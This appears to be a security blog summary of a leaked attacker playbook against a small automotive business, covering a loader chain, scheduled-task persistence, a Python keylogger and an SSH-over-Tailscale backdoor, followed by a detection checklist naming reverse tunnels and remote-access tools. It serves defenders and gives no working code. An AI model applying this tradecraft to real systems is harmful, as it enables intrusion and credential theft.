Quick version: a French-speaking, somewhat clumsy intruder got into a small automotive business, planted a tiny Python keylogger, and grabbed logins. The weird bit? before his usual command-and-control (C2) vanished, he installed OpenSSH and Tailscale on a victim machine and built a backdoor that didn’t care whether the C2 lived or died.

The intrusion, step by step

Security researchers recovered the attacker’s full playbook — literally the keystrokes and 339 commands over 33 days — because the operator left SSH keys and notes in an open storage bucket. The operator, nicknamed Poisson, looked like a junior operator: sloppy, on a school-like schedule, and using free-tier services. Still, sloppy can be effective.

The malware itself mostly lived in memory. The chain started with a VBScript stager that waited out sandbox checks, decrypted a PowerShell loader, which then pulled a .NET loader that ran an in-memory agent. For elevation he used a straightforward Start-Process -Verb RunAs, which pops a UAC prompt and waits for somebody to click yes — not stealthy but it worked after several tries on at least one victim.

Once elevated, the attacker went persistent: a scheduled task that ran at every logon with high privileges, shellcode injected into explorer.exe, and a custom remote tool as a backup. The credential theft was low-tech: a 70-line Python keylogger that wrote keystrokes to a local file. No network beacon, no exfil server — the operator just logged back in and grabbed the file by hand. He even used powercfg to keep the machines awake so the keylogger didn’t miss anything.

The move that bought him long-term access happened overnight across a few hours: he installed an SSH server on Windows, joined the host to his private mesh network, and set up key-based SSH plus a reverse tunnel. That meant he could reach the machine over the encrypted mesh without touching his C2 or exposing ports. When the C2 dropped the next day, the door he built kept working. When the C2 later came back online, agents reconnected automatically — no re-compromise needed.

Interestingly, the attacker’s goals were narrow and direct: steal what people type (bank logins, email passwords, government portal creds). No flashy lateral moves, no ransomware, no big data heist. Tools used were legitimate binaries and signed, which makes them easy to miss if your detections only look for suspicious files instead of suspicious behavior.

What defenders should watch

If you take one thing from this: pulling a C2 off the internet is not a full fix if the attacker has built a separate access path. Hunt for the quiet persistence that outlives takedowns.

  • Alert on installation of OpenSSH Server on Windows workstations — that’s rare and suspicious.
  • Flag tailscale.exe running on systems that don’t need VPN or mesh networking.
  • Look for SSH reverse tunnels (ssh -R) heading out to unknown hosts.
  • Watch for wscript.exe or similar launching .vbs files from user staging folders.
  • Flag scheduled tasks created with highest privileges that launch script interpreters.
  • Monitor changes to powercfg standby/timeout settings (keeps machines awake for harvesting).
  • Block or monitor wildcard DNS services like DuckDNS used for toy infrastructure.

Also check for leftover SSH keys, unexpected scheduled tasks, unknown services, and any odd remote-access tooling. The practical takeaway: treat a C2 takedown as the start of an investigation, not the finish line.

Final note: the attacker wasn’t a master craftsman, but he used simple, legitimate tools in a clever sequence and left a resilient backdoor. That combo — boring tools, smart chaining — is exactly what makes these intrusions painful to clean up.